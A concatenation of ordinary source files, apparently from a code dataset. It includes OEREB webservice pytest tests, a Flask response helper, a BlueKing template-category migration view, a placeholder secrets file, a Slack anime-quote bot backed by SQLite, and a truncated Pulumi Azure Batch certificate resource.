request.matchdict.update({
'format': u'json'
})
request.params.update({
'GNSS': '32.1244978460310,-19.917989937473'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_coord().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
real_estates = response.get('GetEGRIDResponse')
assert isinstance(real_estates, list)
assert len(real_estates) == 1
assert real_estates[0]['egrid'] == u'TEST'
assert real_estates[0]['number'] == u'1000'
assert real_estates[0]['identDN'] == u'BLTEST'
def test_getegrid_ident_missing_parameter():
webservice = PlrWebservice(MockRequest())
with pytest.raises(HTTPBadRequest):
webservice.get_egrid_ident()
def test_getegrid_address():
with pyramid_oereb_test_config():
request = MockRequest(
current_route_url='http://example.com/oereb/getegrid/json/4410/test/10'
)
# Add params to matchdict as the view will do it for
# /getegrid/{format}/{postalcode}/{localisation}/{number}
request.matchdict.update({
'format': u'json',
'postalcode': u'4410',
'localisation': u'test',
'number': u'10'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_address().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
assert response.get('GetEGRIDResponse') is not None
assert response.get('GetEGRIDResponse')[0].get('egrid') == u'TEST'
assert response.get('GetEGRIDResponse')[0].get('number') == u'1000'
assert response.get('GetEGRIDResponse')[0].get('identDN') == u'BLTEST'
def test_getegrid_address_missing_parameter():
webservice = PlrWebservice(MockRequest())
with pytest.raises(HTTPBadRequest):
webservice.get_egrid_address()
def test_get_egrid_response():
with pyramid_oereb_test_config():
request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/')
# Add params to matchdict as the view will do it for /getegrid/{format}/
request.matchdict.update({
'format': u'json'
})
view_service = ViewServiceRecord('test',
1,
1.0,
{'de': 'test'},
None)
record = RealEstateRecord('test', 'BL', 'test', 1, 100,
MultiPolygon([Polygon([(0, 0), (1, 1), (1, 0)])]), view_service,
number='number', identdn='identdn', egrid='egrid')
response = PlrWebservice(request).__get_egrid_response__([record]).json
assert response == {
'GetEGRIDResponse': [{
'egrid': 'egrid',
'number': 'number',
'identDN': 'identdn'
}]
}
def test_get_egrid_response_no_content():
with pyramid_oereb_test_config():
request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/')
# Add params to matchdict as the view will do it for /getegrid/{format}/
request.matchdict.update({
'format': u'json'
})
response = PlrWebservice(request).__get_egrid_response__([])
assert isinstance(response, HTTPNoContent)
@pytest.mark.parametrize('src,dst,buffer_dist', [
('2621857.856,1259856.578', (2621857.856, 1259856.578), None),
('621857.759,259856.554', (2621857.799, 1259856.500), 1.0)
])
def test_parse_xy(src, dst, buffer_dist):
geom = PlrWebservice(MockRequest()).__parse_xy__(src, buffer_dist=buffer_dist)
if buffer_dist:
assert isinstance(geom, Polygon)
assert round(geom.area, 2) == round(math.pi, 2)
assert round(geom.centroid.x, 3) == round(dst[0], 3)
assert round(geom.centroid.y, 3) == round(dst[1], 3)
else:
assert isinstance(geom, Point)
assert round(geom.x, 3) == round(dst[0], 3)
assert round(geom.y, 3) == round(dst[1], 3)
def test_parse_gnss():
geom = PlrWebservice(MockRequest()).__parse_gnss__('47.48911,7.72866')
assert isinstance(geom, Polygon)
assert round(geom.centroid.x, 3) == 2621858.036
assert round(geom.centroid.y, 3) == 1259856.747
assert round(geom.area, 2) == round(math.pi, 2)
def test_parse_invalid_coordinates():
with pytest.raises(HTTPBadRequest):
PlrWebservice(MockRequest()).__parse_gnss__('7.72866')
with pytest.raises(HTTPBadRequest):
PlrWebservice(MockRequest()).__parse_xy__('2621857.856;1259856.578')
| 37.396396 | 110 | 0.635148 |
f391e26b8fa3d1f4d4487fcea813274a176fffce | 354 | py | Python | backend/src/util/response_generator.py | leowucn/lazykindler | 45717e08aa0ccc504a9a5e3883dc403470ae824b | [
"MIT"
] | 2 | 2021-12-22T15:00:15.000Z | 2022-03-21T10:38:30.000Z | backend/src/util/response_generator.py | leowucn/lazykindler | 45717e08aa0ccc504a9a5e3883dc403470ae824b | [
"MIT"
] | null | null | null | backend/src/util/response_generator.py | leowucn/lazykindler | 45717e08aa0ccc504a9a5e3883dc403470ae824b | [
"MIT"
] | null | null | null | from flask import Response, json
from datetime import datetime, date
def response_generator(payload, status):
return Response(response=json.dumps({"payload": payload}), status=status, mimetype='application/json')
# json serializer
def json_serial(obj):
if isinstance(obj, (datetime, date)):
return obj.isoformat()
return str(obj)
| 25.285714 | 106 | 0.731638 |
e310138c0f4ce00425baa11c92f96726e1ab9cbb | 3,328 | py | Python | gcloud/contrib/admin/migration_api/template_category.py | wkma/bk-sops | 8fb5609c0c4495c28d588fbafa9d9f5f2976929b | [
"Apache-2.0"
] | 2 | 2021-07-28T01:48:31.000Z | 2021-11-17T11:02:26.000Z | gcloud/contrib/admin/migration_api/template_category.py | wkma/bk-sops | 8fb5609c0c4495c28d588fbafa9d9f5f2976929b | [
"Apache-2.0"
] | null | null | null | gcloud/contrib/admin/migration_api/template_category.py | wkma/bk-sops | 8fb5609c0c4495c28d588fbafa9d9f5f2976929b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import traceback
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from blueapps.account.decorators import login_exempt
from gcloud.contrib.admin.migration_api.decorators import require_migrate_token
from gcloud.core.constant import TASK_CATEGORY
from gcloud import err_code
from gcloud.label.models import Label, TemplateLabelRelation
from gcloud.tasktmpl3.models import TaskTemplate
@login_exempt
@csrf_exempt
@require_POST
@require_migrate_token
def migrate_template_category(request):
try:
params = json.loads(request.body)
except Exception as e:
return JsonResponse(
{
"result": False,
"message": "request body is not a valid json: {}".format(str(e)),
"code": err_code.REQUEST_PARAM_INVALID.code,
}
)
project_id = params.get("project_id")
creator = params.get("creator", "admin")
MIGRATE_LABEL_COLOR = "#b3eafa"
category_mappings = {}
existing_labels = Label.objects.filter(project_id=project_id).values("id", "name")
label_info = {label["name"]: label["id"] for label in existing_labels}
for category_code, category_name in TASK_CATEGORY:
if category_name in label_info:
category_mappings[category_code] = label_info[category_name]
elif category_code != "Default":
label = Label(
name=category_name,
description=category_code,
is_default=False,
creator=creator,
color=MIGRATE_LABEL_COLOR,
project_id=project_id,
)
label.save()
category_mappings[category_code] = label.id
task_templates = TaskTemplate.objects.filter(project__id=project_id, is_deleted=False).values("id", "category")
label_relationships = [
TemplateLabelRelation(template_id=template["id"], label_id=category_mappings[template["category"]])
for template in task_templates
if template["category"] in category_mappings
]
try:
TemplateLabelRelation.objects.bulk_create(label_relationships, ignore_conflicts=True)
except Exception as e:
return JsonResponse(
{
"result": False,
"error": "migrate template category to labels error: {} \n {}".format(e, traceback.format_exc()),
}
)
return JsonResponse({"result": True, "data": "migrate template category to labels success"})
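# A hedged sketch of how this view could be exercised from a script. The route path and
# the token header below are placeholders/assumptions: the real values come from the url
# configuration and the require_migrate_token decorator, neither of which is shown here.
def call_migrate_template_category(base_url, migrate_token, project_id, creator="admin"):
    import requests  # assumes the requests library is available in the calling environment
    return requests.post(
        "{}/migrate_template_category/".format(base_url),  # hypothetical route
        json={"project_id": project_id, "creator": creator},
        headers={"MIGRATE-TOKEN": migrate_token},  # hypothetical header name
    )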
| 39.619048 | 115 | 0.696514 |
6f53187945bf2acdd63789a349a6bdf3fd9d3e41 | 1,215 | py | Python | secrets.py | GregEigsti/HiveOS-Monitor | 7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c | [
"MIT"
] | null | null | null | secrets.py | GregEigsti/HiveOS-Monitor | 7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c | [
"MIT"
] | null | null | null | secrets.py | GregEigsti/HiveOS-Monitor | 7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
HiveOS-Monitor
HiveOS and currency monitoring script with temperature monitoring and heat management.
Project files:
hiveos.py - main script and stdout output code
temperature.py - temperature monitor / SSH based OC control. Interacts with Adafruit IO for UI goodness
webhelpers.py - web data fetch and parsing methods
secrets.py - account login credentials
Greg Eigsti
greg@eigsti.com
"""
########################################################################################################################
## keys and secrets
########################################################################################################################
# Hive account
HIVE_USER = 'replace'
HIVE_PASS = 'replace'
# Adafruit IO
ADAFRUIT_IO_KEY = 'replace'
# Miner SSH account for OC updates
MINER_USER = 'replace'
MINER_PASS = 'replace'
MINER_IPADDR = '192.168.0.10'
#####################################################################################
## main script entry point
#####################################################################################
if __name__ == '__main__':
    print('Intended to be executed as a HiveOS-Monitor library')
| 31.153846 | 120 | 0.483951 |
222dd53901bfb2ab9baf636ea45e6459defef6a1 | 9,975 | py | Python | runOtakuBot.py | Eagleheardt/otakuBot | 6f8576423bb1b0701d5a60095bed7552b2711bab | [
"Unlicense"
] | null | null | null | runOtakuBot.py | Eagleheardt/otakuBot | 6f8576423bb1b0701d5a60095bed7552b2711bab | [
"Unlicense"
] | null | null | null | runOtakuBot.py | Eagleheardt/otakuBot | 6f8576423bb1b0701d5a60095bed7552b2711bab | [
"Unlicense"
] | null | null | null | import sqlite3
from sqlite3 import Error
import os
import time
import datetime
import re
import random
import schedule
import cryptography
from apscheduler.schedulers.background import BackgroundScheduler
from slackclient import SlackClient
from cryptography.fernet import Fernet
conn = sqlite3.connect('/home/ubuntu/otakuBot/data/anime.db')
serverCursor = conn.cursor()
keyFile = open('/home/ubuntu/otakuBot/data/otakubot_token.key', 'rb')
key = keyFile.read()
keyFile.close()
f = Fernet(key)
encryptedTokenFile = open('/home/ubuntu/otakuBot/data/otakubot_token.encrypted', 'rb')
encryptedToken = encryptedTokenFile.read()
decryptedToken = f.decrypt(encryptedToken)
SLACK_BOT_TOKEN = decryptedToken.decode()
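# One-time setup sketch (not executed by the bot): how the key file and encrypted token
# file read above could have been produced with the same cryptography API. The plaintext
# Slack token is supplied by the caller; the default paths mirror the ones used above.
def write_encrypted_token(plain_token,
                          key_path='/home/ubuntu/otakuBot/data/otakubot_token.key',
                          token_path='/home/ubuntu/otakuBot/data/otakubot_token.encrypted'):
    new_key = Fernet.generate_key()
    with open(key_path, 'wb') as kf:
        kf.write(new_key)
    with open(token_path, 'wb') as tf:
        tf.write(Fernet(new_key).encrypt(plain_token.encode()))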
# instantiate Slack client
slack_client = SlackClient(SLACK_BOT_TOKEN)
# starterbot's user ID in Slack: value is assigned after the bot starts up
otakuBotID = None
# constants
RTM_READ_DELAY = 0.5 # 0.5 second delay in reading events
def stdOut(s):
curDate = datetime.datetime.today().strftime('%Y-%m-%d')
curTime = datetime.datetime.now().strftime('%H:%M:%S')
logFile = open((("/home/ubuntu/logs/{0}.log").format(curDate)),"a")
logFile.write(("{0}: {1}\n").format(curTime,s))
logFile.close()
return
def logIt():
curDate = datetime.datetime.today().strftime('%Y-%m-%d')
curTime = datetime.datetime.now().strftime('%H:%M:%S')
logFile = open((("/home/ubuntu/logs/{0}.log").format(curDate)),"a")
logFile.write(("{0}: Otaku 15 minute check in!\n").format(curTime))
logFile.close()
return
schedule.every(15).minutes.do(logIt)
def SQLReturn(aConn,sqlCmd):
reportCur = aConn.cursor()
reportCur.execute(sqlCmd)
SQLResults = reportCur.fetchall()
reportCur.close()
return SQLResults
def insertQuote (aUser,theQuote):
    # parameterized query so quotes containing apostrophes cannot break the INSERT
    newCur = conn.cursor()
    newCur.execute("INSERT INTO Quotes (User, Words) VALUES (?, ?);", (aUser, theQuote))
    newCur.close()
    conn.commit()
    return
def insertAniMusic (aUser,theLink):
    newCur = conn.cursor()
    newCur.execute("INSERT INTO Music (Category, User, Link) VALUES ('Anime', ?, ?);", (aUser, theLink))
    newCur.close()
    conn.commit()
    return
def insertEngMusic (aUser,theLink):
    newCur = conn.cursor()
    newCur.execute("INSERT INTO Music (Category, User, Link) VALUES ('English', ?, ?);", (aUser, theLink))
    newCur.close()
    conn.commit()
    return
def insertIcon (aUser,theLink):
    newCur = conn.cursor()
    newCur.execute("INSERT INTO Music (Category, User, Link) VALUES ('Iconic', ?, ?);", (aUser, theLink))
    newCur.close()
    conn.commit()
    return
def deleteQuote (quoteID):
    newCur = conn.cursor()
    newCur.execute("DELETE FROM Quotes WHERE ID == ?;", (quoteID,))
    newCur.close()
    conn.commit()
    return
def getQuote(aConn):
    sqlCmd = "SELECT Words FROM Quotes;"
    results = SQLReturn(aConn,sqlCmd)
    allQuotes = []
    for quote in results:
        # each result row is a 1-tuple; keep the text so callers receive a string
        allQuotes.append(quote[0])
    return (random.choice(allQuotes))
def getAniMusic(aConn):
    sqlCmd = "SELECT Link FROM Music WHERE Category = 'Anime';"
    results = SQLReturn(aConn,sqlCmd)
    allQuotes = []
    for quote in results:
        allQuotes.append(quote[0])
    return (random.choice(allQuotes))
def getEngMusic(aConn):
    sqlCmd = "SELECT Link FROM Music WHERE Category = 'English';"
    results = SQLReturn(aConn,sqlCmd)
    allQuotes = []
    for quote in results:
        allQuotes.append(quote[0])
    return (random.choice(allQuotes))
def getIconic(aConn):
    sqlCmd = "SELECT Link FROM Music WHERE Category = 'Iconic';"
    results = SQLReturn(aConn,sqlCmd)
    allQuotes = []
    for quote in results:
        allQuotes.append(quote[0])
    return (random.choice(allQuotes))
def getAllQuotes(aConn):
sqlCmd = "SELECT ID, Words FROM Quotes;"
results = SQLReturn(aConn,sqlCmd)
allQuotes = []
for quote in results:
allQuotes.append(quote)
newStr = "All the Quotes\n"
for item in allQuotes:
i = 1
for place in item:
if i == 1:
newStr += "ID: " + str(place) + "\n"
if i == 2:
newStr += "Words: " + str(place) + "\n\n"
i += 1
return newStr
def EODReportRange (date1, date2): # Gets a range summary of the VM number and status reported
cmd = (("""
SELECT
ServerNumber as [Server]
, ServerStatus as [Status]
, count(ServerStatus) as [Amount]
FROM
Status
WHERE
date(TimeStamp) BETWEEN '{0}' AND '{1}'
AND ServerNumber IN('1','2','3','4','17')
GROUP BY
ServerNumber
,ServerStatus
""").format(date1, date2))
results = SQLReturn(conn,cmd)
newStr = "Report for: " + date1 + " to " + date2 + "\n"
for row in results:
i = 1
for item in row:
if i == 1:
newStr += "VM" + str(item) + " - "
if i == 2:
newStr += "Status: " + str(item) + " - "
if i == 3:
if item != 1:
newStr += "Reported: " + str(item) + " times"
else:
newStr += "Reported: " + str(item) + " time"
i += 1
newStr += "\n"
return newStr
def parseSlackInput(aText):
    if aText and len(aText) > 0:
        item = aText[0]
        if 'text' in item:
            msg = item['text'].strip(' ')
            chn = item['channel']
            usr = item['user']
            stp = item['ts']
            return [str(msg),str(chn),str(usr),str(stp)]
    # no parsable message event in this read; always hand back four values
    return [None,None,None,None]
def inChannelResponse(channel,response):
slack_client.api_call(
"chat.postMessage",
channel=channel,
text=response,
as_user=True
)
return
def threadedResponse(channel,response,stamp):
slack_client.api_call(
"chat.postMessage",
channel=channel,
text=response,
thread_ts=stamp,
as_user=True
)
return
def directResponse(someUser,text):
slack_client.api_call(
"chat.postMessage",
channel=someUser,
text=text,
as_user=True
)
return
def parseQuote(someMsg):
starter,theQuote = someMsg.split(' ', 1)
return theQuote
def handle_command(command, channel, aUser, tStamp):
"""
Executes bot command if the command is known
"""
#command = command.lower()
response = None
# This is where you start to implement more commands!
if command.lower().startswith("!help"):
response = """I'm Otaku Bot!
I don't do a lot yet. But watch out! I'm just getting started!
!addquote[SPACE][A quote of your choice!] - I will remember your quote!
!quote - I will reply with a random quote!
!addAniMusic[SPACE][Link to a Japanese anime song] - I will remember your music!
!addEngMusic[SPACE][Link to an English anime song] - I will remember your music!
!addIconic[SPACE][Link to an iconic anime moment] - I will remember your moment!
!animusic - I will reply with a Japanese anime song from memory!
!engmusic - I will reply with an English anime song from memory!
!iconic - I will show you an iconic anime moment!
"""
inChannelResponse(channel,response)
return
if command.lower().startswith("!addquote"):
newQuote = str(command[10:])
insertQuote(aUser,newQuote)
threadedResponse(channel,"I'll try to remember: " + newQuote ,tStamp)
stdOut("Quote Added: " + newQuote)
return
if command.lower().startswith("!quote"):
aQuote = getQuote(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!animusic"):
aQuote = getAniMusic(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!engmusic"):
aQuote = getEngMusic(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!iconic"):
aQuote = getIconic(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!onepunch"):
inChannelResponse(channel,"https://www.youtube.com/watch?v=_TUTJ0klnKk")
return
if command.lower().startswith("!addanimusic"):
newQuote = str(command[13:])
insertAniMusic(aUser,newQuote)
threadedResponse(channel,"I'll add this to the Anime music section: " + newQuote ,tStamp)
stdOut("Anime Music Added: " + newQuote)
return
if command.lower().startswith("!addengmusic"):
newQuote = str(command[13:])
insertEngMusic(aUser,newQuote)
threadedResponse(channel,"I'll add this to the English music section: " + newQuote ,tStamp)
stdOut("English Music Added: " + newQuote)
return
if command.lower().startswith("!addiconic"):
newQuote = str(command[11:])
insertIcon(aUser,newQuote)
threadedResponse(channel,"I'll add this to the Iconic moments section: " + newQuote ,tStamp)
stdOut("Iconic Moment Added: " + newQuote)
return
if command.lower().startswith("!delquote"):
if aUser == "UC176R92M":
num = command[10:]
deleteQuote(num)
inChannelResponse(channel,"You have removed a quote.")
else:
inChannelResponse(channel,"You don't have permission to do that!")
return
if command.lower().startswith("!getquotes"):
if aUser == "UC176R92M":
inChannelResponse(channel,getAllQuotes(conn))
else:
inChannelResponse(channel,"You don't have permission to do that!")
return
if command.startswith("!test"):
return
response = (("""Text:{0}
Channel:{1}
TS:{2}
User:{3}
""").format(command,channel,tStamp,aUser))
inChannelResponse(channel,response)
return
return
# Sends the response back to the channel
if __name__ == "__main__":
if slack_client.rtm_connect(with_team_state=False):
stdOut("Otaku Bot connected and running!")
# Read bot's user ID by calling Web API method `auth.test`
otakuBotID = slack_client.api_call("auth.test")["user_id"]
while True:
try:
command, channel,usr,stp = parseSlackInput(slack_client.rtm_read())
if command:
handle_command(command, channel,usr,stp)
except:
pass
schedule.run_pending()
time.sleep(RTM_READ_DELAY)
else:
stdOut("Connection failed. Exception traceback printed above.")
| 27.631579 | 95 | 0.665063 |
230fb693f0a2df41ba867638cd3cd03a9e144d30 | 17,150 | py | Python | sdk/python/pulumi_azure_native/batch/v20210601/certificate.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/batch/v20210601/certificate.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/batch/v20210601/certificate.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['CertificateArgs', 'Certificate']
@pulumi.input_type
class CertificateArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
data: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
certificate_name: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input['CertificateFormat']] = None,
password: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None,
thumbprint_algorithm: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Certificate resource.
:param pulumi.Input[str] account_name: The name of the Batch account.
:param pulumi.Input[str] data: The maximum size is 10KB.
:param pulumi.Input[str] resource_group_name: The name of the resource group that contains the Batch account.
:param pulumi.Input[str] certificate_name: The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5.
:param pulumi.Input['CertificateFormat'] format: The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
:param pulumi.Input[str] password: This must not be specified if the certificate format is Cer.
:param pulumi.Input[str] thumbprint: This must match the thumbprint from the name.
:param pulumi.Input[str] thumbprint_algorithm: This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "data", data)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if certificate_name is not None:
pulumi.set(__self__, "certificate_name", certificate_name)
if format is not None:
pulumi.set(__self__, "format", format)
if password is not None:
pulumi.set(__self__, "password", password)
if thumbprint is not None:
pulumi.set(__self__, "thumbprint", thumbprint)
if thumbprint_algorithm is not None:
pulumi.set(__self__, "thumbprint_algorithm", thumbprint_algorithm)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the Batch account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def data(self) -> pulumi.Input[str]:
"""
The maximum size is 10KB.
"""
return pulumi.get(self, "data")
@data.setter
def data(self, value: pulumi.Input[str]):
pulumi.set(self, "data", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group that contains the Batch account.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="certificateName")
def certificate_name(self) -> Optional[pulumi.Input[str]]:
"""
The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5.
"""
return pulumi.get(self, "certificate_name")
@certificate_name.setter
def certificate_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate_name", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input['CertificateFormat']]:
"""
The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input['CertificateFormat']]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
This must not be specified if the certificate format is Cer.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def thumbprint(self) -> Optional[pulumi.Input[str]]:
"""
This must match the thumbprint from the name.
"""
return pulumi.get(self, "thumbprint")
@thumbprint.setter
def thumbprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thumbprint", value)
@property
@pulumi.getter(name="thumbprintAlgorithm")
def thumbprint_algorithm(self) -> Optional[pulumi.Input[str]]:
"""
This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
return pulumi.get(self, "thumbprint_algorithm")
@thumbprint_algorithm.setter
def thumbprint_algorithm(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thumbprint_algorithm", value)
class Certificate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
certificate_name: Optional[pulumi.Input[str]] = None,
data: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input['CertificateFormat']] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None,
thumbprint_algorithm: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Contains information about a certificate.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Batch account.
:param pulumi.Input[str] certificate_name: The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5.
:param pulumi.Input[str] data: The maximum size is 10KB.
:param pulumi.Input['CertificateFormat'] format: The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
:param pulumi.Input[str] password: This must not be specified if the certificate format is Cer.
:param pulumi.Input[str] resource_group_name: The name of the resource group that contains the Batch account.
:param pulumi.Input[str] thumbprint: This must match the thumbprint from the name.
:param pulumi.Input[str] thumbprint_algorithm: This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CertificateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Contains information about a certificate.
:param str resource_name: The name of the resource.
:param CertificateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CertificateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
certificate_name: Optional[pulumi.Input[str]] = None,
data: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input['CertificateFormat']] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None,
thumbprint_algorithm: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CertificateArgs.__new__(CertificateArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["certificate_name"] = certificate_name
if data is None and not opts.urn:
raise TypeError("Missing required property 'data'")
__props__.__dict__["data"] = data
__props__.__dict__["format"] = format
__props__.__dict__["password"] = password
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["thumbprint"] = thumbprint
__props__.__dict__["thumbprint_algorithm"] = thumbprint_algorithm
__props__.__dict__["delete_certificate_error"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["previous_provisioning_state"] = None
__props__.__dict__["previous_provisioning_state_transition_time"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["provisioning_state_transition_time"] = None
__props__.__dict__["public_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:batch/v20210601:Certificate"), pulumi.Alias(type_="azure-native:batch:Certificate"), pulumi.Alias(type_="azure-nextgen:batch:Certificate"), pulumi.Alias(type_="azure-native:batch/v20170901:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20170901:Certificate"), pulumi.Alias(type_="azure-native:batch/v20181201:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20181201:Certificate"), pulumi.Alias(type_="azure-native:batch/v20190401:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20190401:Certificate"), pulumi.Alias(type_="azure-native:batch/v20190801:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20190801:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200301:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200301:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200501:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200501:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200901:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200901:Certificate"), pulumi.Alias(type_="azure-native:batch/v20210101:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20210101:Certificate")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Certificate, __self__).__init__(
'azure-native:batch/v20210601:Certificate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Certificate':
"""
Get an existing Certificate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = CertificateArgs.__new__(CertificateArgs)
__props__.__dict__["delete_certificate_error"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["format"] = None
__props__.__dict__["name"] = None
__props__.__dict__["previous_provisioning_state"] = None
__props__.__dict__["previous_provisioning_state_transition_time"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["provisioning_state_transition_time"] = None
__props__.__dict__["public_data"] = None
__props__.__dict__["thumbprint"] = None
__props__.__dict__["thumbprint_algorithm"] = None
__props__.__dict__["type"] = None
return Certificate(resource_name, opts=opts, __props__=__props__)
@property
